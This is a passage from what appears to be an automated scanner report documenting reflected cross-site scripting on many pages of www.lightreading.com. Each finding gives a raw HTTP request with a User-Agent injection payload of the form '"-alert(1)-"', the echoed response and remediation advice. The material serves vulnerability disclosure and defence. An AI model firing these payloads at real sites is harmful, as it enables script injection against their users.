Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live/event_information.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e7f0"-alert(1)-"49a4e60c5fa Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:29 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 179587 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e7f0"-alert(1)-"49a4e60c5fa"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d17e"-alert(1)-"1db8511833b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6d17e"-alert(1)-"1db8511833b Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:28 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 175988 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6d17e"-alert(1)-"1db8511833b"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96ac9"-alert(1)-"64c7fe1d8e9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lr-cable HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)96ac9"-alert(1)-"64c7fe1d8e9 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:12:28 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 241005 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)96ac9"-alert(1)-"64c7fe1d8e9"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aea16"-alert(1)-"f59567eb8a1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lr-cable/ HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aea16"-alert(1)-"f59567eb8a1 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:19:24 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 242353 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aea16"-alert(1)-"f59567eb8a1"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce029"-alert(1)-"95f5be9abbc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lr-mobile HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ce029"-alert(1)-"95f5be9abbc Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:13:52 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 250814 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Unstrung, 4G, wireless, mobile, 2G, 2.5G, 3G, cellular, PCS, WAP, i-mode, WLAN, Bluetooth ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ce029"-alert(1)-"95f5be9abbc"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8af5b"-alert(1)-"e6150d7c244 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lr-mobile/ HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8af5b"-alert(1)-"e6150d7c244 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:54 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 250323 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Unstrung, 4G, wireless, mobile, 2G, 2.5G, 3G, cellular, PCS, WAP, i-mode, WLAN, Bluetooth ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8af5b"-alert(1)-"e6150d7c244"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86685"-alert(1)-"fb38ad261f4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /message.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)86685"-alert(1)-"fb38ad261f4 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:19 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 259987 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)86685"-alert(1)-"fb38ad261f4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 569db"-alert(1)-"4edf88eff36 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /messages.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)569db"-alert(1)-"4edf88eff36 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:38 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 266297 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)569db"-alert(1)-"4edf88eff36"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b98a"-alert(1)-"09ef647f1d2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /network-intelligence-benchmark-survey.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b98a"-alert(1)-"09ef647f1d2 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:20:43 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Cache-control: private Content-Length: 165465
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b98a"-alert(1)-"09ef647f1d2"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e831c"-alert(1)-"42145f8b4f6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /policy-management/ HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e831c"-alert(1)-"42145f8b4f6 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:50 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 135702 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Policy Management, light reading, lightreading, magazine, telecom, telecommunications, In ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e831c"-alert(1)-"42145f8b4f6"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c9d2"-alert(1)-"c30d296f706 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.asp?piddl_userid=50 HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1c9d2"-alert(1)-"c30d296f706 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:16:37 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 175258 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1c9d2"-alert(1)-"c30d296f706"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 914dc"-alert(1)-"3517a7c3b8f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)914dc"-alert(1)-"3517a7c3b8f Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:19 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 174329 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)914dc"-alert(1)-"3517a7c3b8f"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13f8c"-alert(1)-"53d812fc6dc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quote.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)13f8c"-alert(1)-"53d812fc6dc Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:03:34 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 227282 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)13f8c"-alert(1)-"53d812fc6dc"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44f4b"-alert(1)-"d2574c37433 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /register.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)44f4b"-alert(1)-"d2574c37433 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:01:40 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 168822 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)44f4b"-alert(1)-"d2574c37433"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80fa3"-alert(1)-"b6286669c1b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resource-library.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)80fa3"-alert(1)-"b6286669c1b Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:11 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:18:09 GMT Expires: Sun, 10 Apr 2011 19:18:09 GMT Etag: s200805.p200805 Content-Length: 186458 Cache-control: max-age=10368000, public
